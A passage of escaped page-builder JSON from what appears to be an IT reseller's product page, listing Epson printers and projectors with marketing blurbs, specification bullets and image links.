battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><br>\\n\\nIn creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.\\n<ul>\\n \\t<li>Yield of up to 1,500 4R photos<\\/li>\\n \\t<li>Print speed up to 15ppm<\\/li>\\n \\t<li>High-yield ink bottles<\\/li>\\n \\t<li>1-year warranty or 9,000 prints<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><br><br><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/h4><br>\\nImaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.\\n<ul>\\n \\t<li>High-yield ink bottles<\\/li>\\n \\t<li>2.7 colour LCD screen<\\/li>\\n \\t<li>Direct printing via memory card slot, USB port and PictBridge<\\/li>\\n \\t<li>CD\\/DVD printing<\\/li>\\n \\t<li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br><br><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><br>\\nThe L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.\\n<ul>\\n \\t<li>Yield of Up to 1,800 4R photos<\\/li>\\n \\t<li>Lowest Printing Costs<\\/li>\\n \\t<li>Wi-Fi &amp; Epson iPrint<\\/li>\\n \\t<li>CD\\/DVD Printing Capability<\\/li>\\n \\t<li>1 year or 3,000 prints warranty<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 